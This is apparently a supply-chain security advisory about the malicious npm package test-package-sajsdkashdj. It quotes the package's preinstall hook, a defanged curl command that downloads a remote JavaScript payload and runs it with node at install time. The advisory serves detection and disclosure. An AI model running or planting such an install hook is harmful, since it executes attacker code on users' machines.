test-package-sajsdkashdj@2.1.6
Malicious code in test-package-sajsdkashdj (npm)
T1059.007 · JavaScriptT1105 · Ingress Tool Transfer
Analysis
Package ships no code in the tarball but contains a preinstall lifecycle hook that executes 'curl hxxps://poc[.]amanrawat[.]com/hehe[.]js -o index.js && node index.js' at install time. This downloads a remote JavaScript payload from poc[.]amanrawat[.]com and immediately executes it, a remote-code-download-and-execute supply-chain attack.
- analyzed by
- Leitwacht
- first seen
- Jun 22, 2026, 07:18 AM
- analyzed
- Jun 22, 2026, 07:19 AM
Related advisories
- node-fetch-utils@1.2.1
- @velkov/viem@2.53.1
- anthropic-claude-latest@4.7.1
- libsignal-node-travatiger@1.0.0
- kisama-js@0.1.8
- vitest-cli@1.0.0
- react-check-error@2.1.6
- chai-as-uphelded@6.11.4
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.